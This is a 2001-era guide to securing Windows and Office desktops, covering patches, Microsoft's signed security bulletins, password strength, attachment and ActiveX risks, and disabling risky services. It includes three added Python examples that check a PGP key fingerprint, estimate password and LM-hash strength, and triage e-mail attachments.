Restart Computer.
If you do not have a CD-ROM containing the patches, you can use the Microsoft Windows Update service.
http://windowsupdate.microsoft.com/
This service requires that Internet Explorer 5 or higher be used. If the version of IE that comes with the operating system is earlier than version 5 you must perform an IE update before you can continue. If your IE version is earlier than version 4, you must download the IE 5 (or higher) installer from a friend's computer (~550K) and execute it on your machine to perform the download and installation (~17MB). If you have version 4 you can download the installer from
http://www.microsoft.com/ie/
Once you have a version of IE installed that is 5.0 or higher you can start IE, select the Tools menu, and the Windows Update option. From the Windows Update home page select the PRODUCT UPDATES link. When a connection is established you are prompted with:
Windows Update Security Warning Do you want to install and run "Windows Update Control Package" signed on 5/4/01 7:49 PM and distributed by "Microsoft Corporation" Publisher authenticity verified by Microsoft Code Signing PCA.
You will now see a dialog box "Checking Available Updates..." This will be replaced by a screen listing all of the available updates for your combination of Operating System, Internet Explorer, and Hardware.
To avoid this warning each time you use Windows Update, add the web site windowsupdate.microsoft.com to your list of Trusted Sites:
The list of updates is likely to be quite long and potentially confusing. The following is a list for each operating system of the updates that are to be installed and the order in which they are to be applied. The general rules are as follows:
NOTE: We strongly advise against using Microsoft Outlook or Outlook Express as your electronic mail client. However, even if you do not use it, Outlook Express must still be updated to the current version; otherwise known vulnerabilities related to the reading of e-mail messages in Internet Explorer may remain unpatched.
**Versions of Windows Media Player 6.4 through 7.1 contain a buffer overflow that can allow arbitrary code to be executed when a Windows Media Station (.NSC) file is processed. These files can be launched automatically from within a browser. Users must either apply the patch to version 6.4, or upgrade to version 7.1 and then apply the patch (MS01-042):
http://www.microsoft.com/technet/security/bulletin/MS01-042.asp
Patches sometimes take weeks or months to appear on the Windows Update web site. All security patches for Windows 2000 can be downloaded from:
http://www.microsoft.com/technet/security/current.asp?productid=5&servicepackid=2
There are many patches for Windows NT 4 that are not supplied as part of Service Pack 6a. Microsoft has stated that it will not issue further service packs for NT 4.
http://www.microsoft.com/technet/security/current.asp?productid=1&servicepackid=7
There are no service packs available for Windows ME. From the Windows Update site you should install:
There is one security patch available at:
http://www.microsoft.com/technet/security/current.asp?productid=19&servicepackid=89
There are no service packs available for Windows 98SE. From the Windows Update site you should install:
There is one security patch available at:
http://www.microsoft.com/technet/security/current.asp?productid=11&servicepackid=88
From the Windows Update site you should install:
There are a large number of security patches available for Windows 98 that are not included in SP1.
http://www.microsoft.com/technet/security/current.asp?productid=10&servicepackid=52
http://www.microsoft.com/windows/ie/
In addition, Microsoft has stopped supporting Windows 95. The Windows Update site contains only a small subset of the patches available for the Windows 95 platform. Other patches, including Service Pack 1 and updated versions of the Windows TCP/IP stack (Winsock), are only available from the Windows 95 Download site:
http://www.microsoft.com/windows95/downloads/default.asp
Patches that should be installed from the Windows 95 Download site include:
From the Windows Update site you can then install:
There are additional security patches available for all releases of Windows 95 not found on the previous two locations at:
http://www.microsoft.com/technet/security/current.asp?productid=9&servicepackid=50
If you have a CD-ROM with the appropriate patches, install them from the CD-ROM. Otherwise, use Internet Explorer to open
http://office.microsoft.com/productupdates
This web site is very similar to Windows Update, except that instead of providing updates based on the operating system version, the MS Office version is tested. As with Windows Update, you will need to accept an ActiveX control, and you may want to add the office.microsoft.com hostname to the Trusted Sites list in Internet Options.
The list of updates for each version of Microsoft Office follows.
Office XP has one Security Patch available.
http://www.microsoft.com/technet/security/current.asp?productid=116&servicepackid=0
With SP-2 installed, there are still several security patches to be installed.
http://www.microsoft.com/technet/security/current.asp?productid=42&servicepackid=11
The Windows Installer used by Office 2000 requires access to the original media. Here is Microsoft's explanation why it is required:
http://support.microsoft.com/support/kb/articles/Q255/4/99.ASP
http://www.microsoft.com/technet/security/current.asp?productid=70&servicepackid=29
There is one security patch to be installed on Office 95. Office 95 does not have the same kinds of vulnerabilities as later versions because it was not Internet-aware.
http://www.microsoft.com/technet/security/current.asp?productid=69&servicepackid=0
If you are using Internet Information Services (IIS) be sure to run the IIS Lockdown Tool (Section 8.3.2.2).
As long as your computer is connected to outside sources of data it will not be possible to protect it completely from infection. Infections occur either because a vulnerability in the operating system or an application is actively attacked, or because a user unintentionally activates the virus in the course of normal everyday activities. So what can we do?
First, you can reduce the number of known vulnerabilities your computer is susceptible to:
Second, you must lower your trust level when interacting with information sent to you by third parties. Security professionals will tell you that if you do not control the source of a communication you cannot be sure that it is safe. Virus authors use our trusting nature against us, sending virus-bearing e-mail from the accounts of our friends and family, or altering the web pages of trusted companies to convince us to download the virus to our machines. As the rate of incidents continues to increase we must respond with increased vigilance. We need to be conscious of our actions and of how they may allow us to be taken advantage of. In other words, communicating over the web is not as safe as we would like it to be. Just as we must be careful of what we say to someone who calls us on the phone claiming to be from our bank, we must be careful of what we accept in e-mail or from web pages.
For those who are unaware: if someone calls you claiming to be from your bank or from any other company with which you have an on-going relationship, do not give the caller:
All of this information is already known to your bank (or the other company you are doing business with) and they have no reason to ask you for it. If there is a legitimate reason why they need this information, the caller should ask you to call the phone number on the back of your credit card or on your monthly statement and speak with the appropriate representative. Only by initiating the call yourself, to a previously known phone number, can you have any assurance of safety, since you have no means of authenticating that the caller is truly from your bank when you answer the phone.
The goal of Microsoft's security notification service is to provide you with information that you can use to inform and protect yourself from malicious attacks. Microsoft's security team investigates issues reported directly to Microsoft, as well as issues discussed in certain popular security newsgroups. When they publish bulletins, the bulletins contain information on what the issue is, what products it affects (if any), how to protect yourself against it, what Microsoft plans to do to fix the problem, and links to other sources of information on the issue.
This service supplements the security bulletins and other information located at Microsoft product security.
Microsoft digitally signs all security bulletins. To verify the signature, please download their PGP key from
http://www.microsoft.com/technet/security/MSRC.asc.
-----BEGIN PGP PUBLIC KEY BLOCK-----
Version: PGP 6.0.2

mQENAziJZQwAAAEIALIflq+a5TJ5+rkJl6u4NtaEgeggoufIFy2O0luplLaE+3sw
E0MfG7Hr9b9yNLjMOD7/ZakIy4/54ph910K7qx1r3swo97gPuiDf11AhPzpmMe3m
iP2EV3XeoL0e69GF/AwZ/KB4im+/WMMqwHmF4OjWZX4PWG7QA3YM+mRg8x4768So
thxKx1sMO/ll1lAqryyzkWO3hODuOs7UiCPy0PgFBtlZ/qJU8VR/8z1vWX6aTDcl
3plT6MXiQuBGWXb/jHHfUEC7s5BtmWtA/Sdxf/oVDothMg48otI6tetzf/Rp6asa
PmmOH99+QE2At4YYbtK3a7/ss7YTjRlJFDED9SsABRG0OU1pY3Jvc29mdCBTZWN1
cml0eSBSZXNwb25zZSBDZW50ZXIgPHNlY3VyZUBtaWNyb3NvZnQuY29tPokBFQMF
EDiJZQyNGUkUMQP1KwEBmCkH/ReYt47MhLQ8lk+thpNwnwWpFMYnhi1189sZy+GH
p44pCdQ7dfubR2/JiCIjlXqtR6Mu5NzSnjt3l217ss11/X+iuZR4fjOTNFz1b77M
/OwTPNNkZTxL5nJ3BIBcTDKRaErTk5oZt5nXUPpzIwM/GQ17A9okL6qOFcreNR/a
6cO8DiPBgbvgrs560+NpEk2lBBP7yvaHJqwqQnRQCZ15uqhtIl/BlxEYE32XWgu+
k1RxrRRuW3NX9Q0cEXmioSiI+1V31E0H6Pa8e7Vy/EORsNopRgiZr/JBON0vCrDf
UTlwjUufpCnM2VBvNi/O3C2BhJoL9hEF0X0rzQN87j1wpO6JARUDBRA4jIFR/6uy
0GMwPK8BAS5lB/9rOkn/35961yqfROBooGW1g9CrM/3hX+jZf0z4NUYOoLoXQQGM
9kVDpmsnADytOJ2xNgle9WWEzPLfcwJv4C7o1Yp4UAHeNKOzUH6hFCz7QzfkQ+dY
aZCoL8r0qrUyNQJ263FDupo5NBt4XCDTd0zYfbUkbeHKsECKTB6tJVtUzD9jMUjq
9LVaqY/+4/NQSjOOhImlA1khF9oTypR+jloaAflEal3/Cuo1ibHgd6j1dYjHQy7p
X3iOnlRAdpG445U+Y3uEzsqiZVY1hK46ICZF+r19Xm7gPC3p0Jo5/K7oXepKnfgn
0zjm496p6l++ie973TTRW844JLMmLZ82h/14
=3JpF
-----END PGP PUBLIC KEY BLOCK-----
The key's fingerprint is 5E39 0633 D6B3 9788 F776 D980 AB7A 9432.
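A pasted key block is only as trustworthy as the fingerprint you check it against, so the check is worth doing before the key is used to verify a bulletin. The following Python script is an added example (it is not part of the original document and is not a Microsoft tool): it decodes the ASCII armor printed above, verifies the armor's CRC-24, parses the version 3 RSA public-key packet, and computes the fingerprint that PGP defines for version 3 keys (RFC 2440: MD5 over the bodies of the modulus n and the exponent e, without their length prefixes). The key block and the stated fingerprint are copied from this document; the script uses only the Python standard library and handles the old-format packet headers that PGP 6 emits.

```python
import base64
import hashlib
import struct

# The Microsoft Security Response Center key exactly as printed in this
# document (armor produced by PGP 6.0.2).
MSRC_KEY_ARMOR = """-----BEGIN PGP PUBLIC KEY BLOCK-----
Version: PGP 6.0.2

mQENAziJZQwAAAEIALIflq+a5TJ5+rkJl6u4NtaEgeggoufIFy2O0luplLaE+3sw
E0MfG7Hr9b9yNLjMOD7/ZakIy4/54ph910K7qx1r3swo97gPuiDf11AhPzpmMe3m
iP2EV3XeoL0e69GF/AwZ/KB4im+/WMMqwHmF4OjWZX4PWG7QA3YM+mRg8x4768So
thxKx1sMO/ll1lAqryyzkWO3hODuOs7UiCPy0PgFBtlZ/qJU8VR/8z1vWX6aTDcl
3plT6MXiQuBGWXb/jHHfUEC7s5BtmWtA/Sdxf/oVDothMg48otI6tetzf/Rp6asa
PmmOH99+QE2At4YYbtK3a7/ss7YTjRlJFDED9SsABRG0OU1pY3Jvc29mdCBTZWN1
cml0eSBSZXNwb25zZSBDZW50ZXIgPHNlY3VyZUBtaWNyb3NvZnQuY29tPokBFQMF
EDiJZQyNGUkUMQP1KwEBmCkH/ReYt47MhLQ8lk+thpNwnwWpFMYnhi1189sZy+GH
p44pCdQ7dfubR2/JiCIjlXqtR6Mu5NzSnjt3l217ss11/X+iuZR4fjOTNFz1b77M
/OwTPNNkZTxL5nJ3BIBcTDKRaErTk5oZt5nXUPpzIwM/GQ17A9okL6qOFcreNR/a
6cO8DiPBgbvgrs560+NpEk2lBBP7yvaHJqwqQnRQCZ15uqhtIl/BlxEYE32XWgu+
k1RxrRRuW3NX9Q0cEXmioSiI+1V31E0H6Pa8e7Vy/EORsNopRgiZr/JBON0vCrDf
UTlwjUufpCnM2VBvNi/O3C2BhJoL9hEF0X0rzQN87j1wpO6JARUDBRA4jIFR/6uy
0GMwPK8BAS5lB/9rOkn/35961yqfROBooGW1g9CrM/3hX+jZf0z4NUYOoLoXQQGM
9kVDpmsnADytOJ2xNgle9WWEzPLfcwJv4C7o1Yp4UAHeNKOzUH6hFCz7QzfkQ+dY
aZCoL8r0qrUyNQJ263FDupo5NBt4XCDTd0zYfbUkbeHKsECKTB6tJVtUzD9jMUjq
9LVaqY/+4/NQSjOOhImlA1khF9oTypR+jloaAflEal3/Cuo1ibHgd6j1dYjHQy7p
X3iOnlRAdpG445U+Y3uEzsqiZVY1hK46ICZF+r19Xm7gPC3p0Jo5/K7oXepKnfgn
0zjm496p6l++ie973TTRW844JLMmLZ82h/14
=3JpF
-----END PGP PUBLIC KEY BLOCK-----
"""

# The fingerprint stated in the text; the script checks the key against it.
STATED_FINGERPRINT = "5E39 0633 D6B3 9788 F776 D980 AB7A 9432"


def crc24(data):
    """CRC-24 used by OpenPGP ASCII armor (RFC 2440 section 6.1)."""
    crc = 0xB704CE
    for octet in data:
        crc ^= octet << 16
        for _ in range(8):
            crc <<= 1
            if crc & 0x1000000:
                crc ^= 0x1864CFB
    return crc & 0xFFFFFF


def dearmor(armor):
    """Return (packet bytes, crc_ok) for one ASCII-armored block."""
    lines = armor.strip().splitlines()
    if not (lines[0].startswith("-----BEGIN PGP") and lines[-1].startswith("-----END PGP")):
        raise ValueError("not an armored block")
    body = lines[1:-1]
    while body and body[0].strip():      # armor headers end at the first blank line
        body.pop(0)
    body = [line.strip() for line in body if line.strip()]
    crc_line = body.pop()                # last line is "=" + base64(CRC-24)
    data = base64.b64decode("".join(body))
    stated_crc = int.from_bytes(base64.b64decode(crc_line[1:]), "big")
    return data, crc24(data) == stated_crc


def read_packets(data):
    """Yield (tag, body) for old-format OpenPGP packets, which is what PGP 6 wrote."""
    pos = 0
    while pos < len(data):
        hdr = data[pos]
        if not (hdr & 0x80) or (hdr & 0x40):
            raise ValueError("only old-format packet headers are handled here")
        tag, ltype = (hdr >> 2) & 0x0F, hdr & 0x03
        if ltype == 0:
            length, pos = data[pos + 1], pos + 2
        elif ltype == 1:
            length, pos = struct.unpack(">H", data[pos + 1:pos + 3])[0], pos + 3
        elif ltype == 2:
            length, pos = struct.unpack(">I", data[pos + 1:pos + 5])[0], pos + 5
        else:
            raise ValueError("indeterminate packet length not supported")
        yield tag, data[pos:pos + length]
        pos += length


def read_mpi(body, pos):
    """Read one multi-precision integer; return (value bytes, next position)."""
    bits = struct.unpack(">H", body[pos:pos + 2])[0]
    nbytes = (bits + 7) // 8
    return body[pos + 2:pos + 2 + nbytes], pos + 2 + nbytes


def v3_rsa_key_info(armor):
    """Parse the first public-key packet (tag 6) and return its identifiers."""
    data, crc_ok = dearmor(armor)
    for tag, body in read_packets(data):
        if tag != 6:
            continue
        # V3 layout: version(1) time(4) validity(2) algorithm(1) n e
        if body[0] != 3 or body[7] != 1:
            raise ValueError("not a version 3 RSA public key")
        n, pos = read_mpi(body, 8)
        e, _ = read_mpi(body, pos)
        fp = hashlib.md5(n + e).hexdigest().upper()
        return {
            "crc_ok": crc_ok,
            "created": struct.unpack(">I", body[1:5])[0],
            "key_bits": len(n) * 8,
            "key_id": n[-8:].hex().upper(),        # V3 key ID: low 64 bits of n
            "fingerprint": " ".join(fp[i:i + 4] for i in range(0, 32, 4)),
        }
    raise ValueError("no public-key packet found")


def fingerprint_matches(armor, stated):
    return v3_rsa_key_info(armor)["fingerprint"] == stated.strip().upper()


if __name__ == "__main__":
    info = v3_rsa_key_info(MSRC_KEY_ARMOR)
    print(info)
    print("matches stated fingerprint:",
          fingerprint_matches(MSRC_KEY_ARMOR, STATED_FINGERPRINT))
```

The CRC only proves the armor was copied intact; the fingerprint comparison is what ties the block to the value Microsoft publishes, and it should be repeated against a second source (for example the fingerprint printed in a bulletin you already trust) rather than against the same web page the key came from.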
It is very important that when Microsoft announces a vulnerability and a patch that the advice be taken seriously and the patch installed. You can be sure that if you know about the vulnerability so do all of the potential virus writers and others that might want to attack your computer system. By installing the patches or removing services that are considered vulnerable you significantly reduce the chances that attacks against your computer will succeed.
To subscribe, compose an e-mail to
microsoft_security-subscribe-request@announce.microsoft.com
The subject line and the message body are not used to process the subscription request, and can be anything you like. Send the e-mail. You'll receive a response asking you to verify that you really want to subscribe. Compose a reply, put "OK" in the message body (without the quotes), and send it. You'll receive two e-mails, one telling you that you have been added to the subscriber list, and the other with more information on the notification service and its purpose. You'll then receive security notifications whenever Microsoft sends them.
To cancel your subscription, compose an e-mail to
microsoft_security-signoff-request@announce.microsoft.com
The subject line and the message body are not used to process the request, and can be anything you like. Send the e-mail. You'll receive a response asking you to verify that you really want to cancel your subscription. Compose a reply, put "OK" in the message body (without the quotes), and send it. You'll receive an e-mail telling you that your name has been removed from the subscriber list.
The most common ways for an attacker to take advantage of a user are:
To prevent these types of attacks requires a change in the way you interact with your computer.
The most secure systems require at least two of the three types. Unfortunately, most computer systems still require only a password. This means that it is extremely important that the password be strong. What does it mean for a password to be strong? It means that the likelihood of its being guessed is very remote.
You may have read about the different strengths of cryptographic algorithms. There has been a large amount of debate over how strong the U.S. government should allow the algorithms to be, because the longer the keys used to protect communications, the harder it is for the government to perform electronic wiretapping. Of course, the harder it is for the government, the harder it is for criminals to listen in as well.
Starting in the 1970s the U.S. government required that sensitive but unclassified government communications be protected by the Data Encryption Standard (DES). DES uses 56-bit keys. At the time, 56-bit keys were considered unbreakable with the computer equipment available. Now, in 2001, a 56-bit DES key can be broken in under a day with specially designed equipment built from off-the-shelf parts. The U.S. government has recently approved a replacement for DES called the Advanced Encryption Standard (AES). AES supports key lengths of 128, 192 and 256 bits.
Now you may be asking yourself why I am spending all this time talking about numbers of bits when I started off talking about passwords. It is actually pretty simple. A password is nothing more than data that is used to generate a key. That key is then used to protect some other data by encrypting it with a cryptographic algorithm. The strength of the key has a direct impact on how secure the protected data is.
Passwords consist of printable characters: upper and lower case letters, digits, punctuation marks, and a few other symbols, about 95 in all. Each character in your password therefore contributes less than 7 bits to the resulting key. This means that an 8 character password is at best a 56-bit key. Remember that the 56-bit keys used with DES can be broken in under a day. With a modern 1 GHz computer with a gigabyte of memory and several hundred gigabytes of disk space, an attacker can break an 8 character password in a little more than a day using a brute force attack.
Unfortunately, most users do not choose even 8 character passwords, and the passwords they do choose are frequently words found in a dictionary. Attackers can therefore optimize the attack by checking all of these common words first; then combinations of words; then addresses, phone numbers, birthdays, and so on. This cuts the time needed to discover a password to a matter of minutes when the attack can be performed off-line. An off-line attack is one where the attacker does not need to access the computer being attacked while trying to determine the password (for example, when the attacker has obtained a copy of the file of hashed passwords). An on-line attack is one where the attacker must contact the computer in order to try each potential password. On-line attacks are costly because of the time it takes to establish the connection used to test each password, and because of the high risk of detection caused by the failed attempts.
Passwords are used for two purposes: to authenticate the user to a service in order to gain entry, or to unlock an encrypted file so that it can be read. Windows NT/2000/XP has multiple accounts. At a minimum it has an "Administrator" and a "Guest" account. In addition to these are any accounts that you create to represent yourself while using the computer. Since it is possible to connect to a Windows NT/2000/XP system over the network and attempt to authenticate as any of these accounts, it is very important that the passwords used for the accounts be strong.
Your Windows password is also used to protect any "saved passwords" associated with dial-up connections, web sites, e-mail accounts, and other services provided by Microsoft Windows. Other applications may require other passwords to protect files that contain SSH, X.509 or PGP private keys, or passwords used when connecting to other hosts. It is important that all of these passwords not only be strong but be different. If one of the passwords is compromised you do not want to lose all of them.
If you have ever lost your wallet containing your drivers license, social security card, credit cards, bank cards, and student identification you understand the pain caused when you lose everything at once. Losing your driver's license is bad enough, but with the rest of your IDs you can easily convince the State to issue you a replacement. However, when you lose all of your IDs and credit cards not only must you cancel everything you have lost, but you have no easy method for acquiring replacements since you have no form of identification.
I have used the term strong password many times now without defining what it means. A strong password:
An 8 character password is no stronger than 40 bits. A 12 character password is no stronger than 56 bits. A password stronger than 128 bits would have to be at least 26 characters long. (These figures assume about 5 bits of strength per character, which is closer to what real passwords achieve than the 7-bit theoretical maximum above.) Unfortunately, for compatibility with older Windows versions the Windows password is restricted to 14 characters, or no stronger than 70 bits.
Passwords are often stolen because they are kept in plain view: taped to the computer on which they are used, or stored in a wallet, appointment book, or personal digital assistant where they can easily be read. Clearly these are bad practices.
Passwords are also frequently stolen by capturing unencrypted network traffic between your computer and a remote service you are logging in to. Passwords should never be sent over unencrypted connections, whether the session is HTTP (web), FTP (file transfer), TELNET (remote login), POP3 or IMAP (e-mail), or any other service. If you do not know that the connection is protected, do not send the password.
Passwords are protected when an HTTP connection is secured using SSL/TLS; when FTP or Telnet sessions are authenticated using Kerberos or Secure Remote Password (SRP); or when the sessions themselves are protected with SSL/TLS. SSH likewise reduces the risk of transmitting passwords, since the session is encrypted before the password is sent.
Passwords should not be stored in the file system of a computer on which those passwords are used. If they must be stored on your computer they should be encrypted and protected with a super-strength password, that is, a password stronger than any of the passwords stored in the protected file.
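The numbers above are easy to reproduce. The following Python script is an added example, not part of the original document: it computes the search-space bound from the character classes a password uses (the "less than 7 bits per character" figure), the 5-bits-per-character rule of thumb behind the 40/56/128-bit figures, and the time a brute-force search takes at an assumed guess rate. It also shows why the 14-character Windows limit is worse than it looks: the limit comes from the legacy LanManager (LM) hash, which upper-cases the password, pads it to 14 bytes and splits it into two independent 7-byte halves, each used as a DES key, so an attacker never has to search a 14-character space. The guess rate and the 68-symbol LM character pool are assumptions of the example.

```python
import math
import string

# Character classes and the pool each adds to an attacker's search.
POOLS = {
    "lower": set(string.ascii_lowercase),     # 26
    "upper": set(string.ascii_uppercase),     # 26
    "digit": set(string.digits),              # 10
    "other": set(string.punctuation + " "),   # 33: punctuation and space
}                                             # all four together: the 95 printable ASCII characters


def search_space_bits(password):
    """Upper bound on strength: log2 of how many candidates an attacker who
    knows the length and the character classes in use must try. With all
    four classes that is log2(95) = 6.57 bits per character, the 'less than
    7 bits' figure in the text."""
    pool = sum(len(chars) for chars in POOLS.values()
               if any(c in chars for c in password))
    return len(password) * math.log2(pool) if pool else 0.0


def rule_of_thumb_bits(password, bits_per_char=5.0):
    """The practical estimate used in the text: about 5 bits per character,
    so 8 characters give 40 bits, 12 give 56 and 26 are needed to pass 128."""
    return len(password) * bits_per_char


def brute_force_days(bits, guesses_per_second):
    """Worst-case days to try every candidate in a space of 2**bits."""
    return 2 ** bits / guesses_per_second / 86400


# Assumed LM character pool: upper case, digits and punctuation (68 symbols).
LM_POOL = len(set(string.ascii_uppercase + string.digits + string.punctuation))


def lm_hash_bits(password):
    """Strength that survives the legacy LanManager (LM) hash, the reason for
    the 14-character limit. The password is upper-cased, padded to 14 bytes
    and split into two independent 7-byte halves, each used as a DES key,
    so the attacker cracks two 7-character halves, never one 14-character
    password. Returns None for longer passwords, for which Windows stores
    no LM hash at all."""
    if len(password) > 14:
        return None
    halves = 2 if len(password) > 7 else 1   # a short password's 2nd half is all padding
    return math.log2(halves) + 7 * math.log2(LM_POOL)


def report(password, guesses_per_second=1e9):
    """Summary for one password at an assumed attacker speed (guesses/second)."""
    bound = search_space_bits(password)
    lm = lm_hash_bits(password)
    return {
        "length": len(password),
        "search_space_bits": round(bound, 1),
        "rule_of_thumb_bits": rule_of_thumb_bits(password),
        "days_at_rate": round(brute_force_days(bound, guesses_per_second), 2),
        "lm_hash_bits": None if lm is None else round(lm, 1),
    }


if __name__ == "__main__":
    for pw in ["password", "Tr0ub4dor&3", "Password123456", "a phrase of twenty-six chars"]:
        print(pw, report(pw))
    print("56-bit DES key at 1e9 keys/s:", round(brute_force_days(56, 1e9)), "days")
```

Two things the output makes visible that the prose does not: a 14-character mixed-case password that looks like 83 bits of search space is protected by only about 44 bits while an LM hash of it exists, and going to 15 characters removes the LM hash entirely, which is the cheapest single improvement available on NT/2000/XP.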
The number one method for propagating viruses and worms is e-mail attachments. This has been the case for a long time. For as long as e-mail has been capable of transferring program and data files (whether uuencoded or using MIME), people have succumbed to the natural desire to share cool things with their friends. This meant that trojan horse viruses were passed from person to person simply because someone thought that someone else should share the joke, the game, or the office document. As the virus was activated on a computer it would turn additional files into trojans, which were then used to spread the virus to other machines. This method is most frequently used with the macro viruses that infect data files of applications containing integrated scripting languages (e.g., Microsoft Office applications). By infecting documents that users frequently exchange as part of their normal day-to-day activities, a large number of computers can be infected in a passive manner.
Virus authors have learned to take advantage of scripting languages and lower-level operating system calls to write viruses that not only infect local files but also automatically mail themselves to e-mail addresses found in your electronic address books and in files stored in your web cache. As application authors have placed restrictions on how e-mail can be sent using the built-in scripting languages, virus authors have written their own mailers to include as part of the virus. Viruses that actively mail themselves to others spread at a much faster rate than the older passive viruses. They also significantly increase the percentage of e-mail containing infected attachments.
The active e-mail viruses have produced a large increase in the amount of mail being sent on the Internet. eWeek has estimated that the current e-mail infection rate is 1 out of every 300 e-mails. If the viruses continue to spread at their current rate it is thought that 1 in 10 e-mails will contain a virus by the end of 2002. It is therefore crucial that we stop treating attachments as harmless and instead treat them as something that must be quarantined and scanned for infection.
What rules should apply to e-mail attachments that will determine if the e-mail attachment you are receiving is safe to open?
The first rule is to determine whether the e-mail itself is something you are expecting. If you have been carrying on a dialog with a co-worker and then suddenly receive an e-mail with the same subject line saying nothing more than "Can you take a look at this for me?", you should be suspicious. Call or otherwise contact your co-worker to determine whether she actually meant to send you the attached document. This is necessary because a virus running on the sender's computer has access to the sender's mailbox; it can reply to an e-mail she received from you as a means of transporting itself to a new host. Even if your co-worker did intend to send the attachment, you must still scan it for viruses with your anti-virus software. You do not know that the attachment is free of known viruses unless you do.
The second rule is never to open attachments sent to mailing lists. For starters, mailing list etiquette says that attachments should not be sent, for two reasons:
Unfortunately, being safe means that many conveniences users are accustomed to must be disabled in PC-based e-mail clients: preview panes, automatic display of a message simply by selecting its subject line, and the use of embedded scripting languages and executable program code. While these features increase ease of use and allow a richer multimedia experience, they also increase the number of opportunities for a virus to gain access to the computer.
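The two rules above can be applied mechanically before a message ever reaches a preview pane. The following Python script is an added example (not part of the original document and not a feature of any mail client named here): it parses a raw message with the standard library's email package, classifies every attachment by the extension Windows will act on, flags the double-extension trick ("vacation.jpg.vbs") and a Content-Type header that contradicts the file name, and never returns "ok", because the rule in the text is that every attachment is scanned before it is opened. The sample message is constructed for the example; the extension lists are the author's choice of the script and executable types Windows runs directly, plus the Office formats that can carry macros.

```python
import email
import os
from email import policy
from email.message import EmailMessage

# File extensions Windows executes or interprets directly when "opened".
EXECUTABLE_EXTS = {".exe", ".com", ".bat", ".cmd", ".pif", ".scr", ".vbs",
                   ".vbe", ".js", ".jse", ".wsf", ".wsh", ".hta", ".lnk", ".reg"}
# Office formats that can carry macros (the macro viruses discussed above).
MACRO_EXTS = {".doc", ".dot", ".xls", ".xlt", ".ppt", ".pps", ".mdb"}


def triage_attachment(filename, content_type):
    """Classify one attachment as ('block', reason) or ('scan', reason).

    Nothing is ever 'ok': every attachment is scanned before it is opened.
    The Content-Type header is chosen by the sender, so the file name,
    which decides what Windows does on double-click, takes precedence."""
    name = (filename or "").lower()
    stem, ext = os.path.splitext(name)
    if ext in EXECUTABLE_EXTS:
        reasons = [f"{ext} runs as code when opened"]
        inner = os.path.splitext(stem)[1]
        if inner and inner not in EXECUTABLE_EXTS:
            reasons.append(f"double extension disguises it as {inner}")
        if not content_type.startswith("application/"):
            reasons.append(f"declared type {content_type} does not match")
        return "block", "; ".join(reasons)
    if ext in MACRO_EXTS:
        return "scan", f"{ext} documents can carry macros; scan before opening"
    return "scan", "scan with current virus definitions before opening"


def triage_message(raw_message):
    """Return {filename: (verdict, reason)} for each attachment of a raw message."""
    msg = email.message_from_bytes(raw_message, policy=policy.default)
    findings = {}
    for part in msg.iter_attachments():
        name = part.get_filename() or "(unnamed)"
        findings[name] = triage_attachment(name, part.get_content_type())
    return findings


def build_sample_message():
    """A constructed message (not a real capture) shaped like the suspicious
    reply described in the text: a familiar subject line, a one-line body,
    and three attachments of differing risk."""
    msg = EmailMessage()
    msg["From"] = "colleague@example.edu"
    msg["To"] = "you@example.edu"
    msg["Subject"] = "Re: budget figures"
    msg.set_content("Can you take a look at this for me?")
    msg.add_attachment(b"\xd0\xcf\x11\xe0" + b"\x00" * 12, maintype="application",
                       subtype="vnd.ms-excel", filename="budget.xls")
    # A script hidden behind a double extension and a lying Content-Type.
    msg.add_attachment(b'MsgBox "hi"\r\n', maintype="image", subtype="jpeg",
                       filename="vacation.jpg.vbs")
    msg.add_attachment("Meeting moved to 3pm.\n", filename="notes.txt")
    return msg.as_bytes()


if __name__ == "__main__":
    for name, (verdict, why) in triage_message(build_sample_message()).items():
        print(f"{verdict:5s}  {name:20s}  {why}")
```

Run on the sample, the script blocks the .vbs outright and marks the spreadsheet and the text file for scanning; the spreadsheet is not "safe" just because it is a document, which is the point the macro-virus discussion above makes.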
There are three actions that can be applied to a download from a web page:
Program files and documents should always be saved to disk, checked for viruses, and then, if they appear to be safe, executed or opened. Under normal conditions a web site will not contain instructions to automatically download a file to your computer, either to save it to disk or to execute it. If a web site has been modified to attack your computer (as was done by Nimda) the browser will pop up a window asking what you would like to do with the file (open, save or cancel). If you are not expecting a file to be downloaded, cancel the operation.
The verification of a signed ActiveX control is performed by checking the signature against the signer's certificate and then checking that the certificate chains to a Certificate Authority certificate held in the browser's trusted root store. If the chain is valid and the signer's certificate has not expired or been revoked, the ActiveX control is considered verified.
It is important to know that the security of this verification system depends on commercial companies such as VeriSign, which act as Certificate Authorities, not making mistakes. Unfortunately, no person or company is perfect. VeriSign issued two code-signing certificates to an unknown party claiming to be a Microsoft employee, which gave that individual the ability to sign ActiveX controls as "Microsoft Corporation". This forced Microsoft to issue a patch for Windows that prevents the mis-issued certificates from being accepted as valid. Any Windows system that is not patched is vulnerable to an attack by someone misrepresenting their ActiveX controls as being from Microsoft. The patch to correct this specific problem is available from the Windows Update web site.
A signed ActiveX control can also be marked by its author as Safe for Scripting. This marking indicates only that the author of the control says it is "safe". Microsoft describes marking a control Safe for Scripting as the author entering into a legally binding contract with the user of the control. However, I doubt this would stop a virus author from abusing the flag.
ActiveX controls, unlike Java applets, have complete access to the computer under the identity of the user who started the browser in which the control executes. This makes ActiveX controls a very tempting vehicle for virus authors. The "Microsoft Corporation" signing certificates could have been used as part of a widespread attack, since most people will accept anything Microsoft publishes to the web. The reason it is so important to apply the "Root Certificates Update" from the Windows Update site is to prevent these invalid certificates from being accepted as valid.
Permission is often requested by web-based installation routines. When Java applets are used for this purpose, the web site should explain the permission request in its installation instructions. It goes without saying that you should not install software downloaded from a web source that might not be trustworthy.
This section will attempt to highlight some of the features which may be unnecessarily putting you at risk as well as configuration options which can be applied to strengthen the security of the computer.
These operating systems can safely be used as client-only computers after several features have been disabled: Personal Web Server, File and Print Sharing and the Remote Registry Service should be uninstalled. Other remote access products such as pcAnywhere should not be installed.
Personal Web Server and Remote Registry Service are removed using the Add/Remove Programs Control Panel. File and Print Sharing is removed using the Network Control Panel.
It is strongly recommended that if your computer hardware will support Windows NT/2000/XP that you replace your operating system as NT/2000/XP can be configured in a significantly more secure manner.
http://www.microsoft.com/Downloads/Release.asp?ReleaseID=32362
http://support.microsoft.com/support/kb/articles/q303/2/15.asp?id=303215&sd=tech
http://www.microsoft.com/technet/mpsa/start.asp
The Microsoft Personal Security Advisor (MPSA) is an ActiveX control that scans Windows NT and Windows 2000 client systems (not servers) for a variety of vulnerabilities:
To perform a scan:
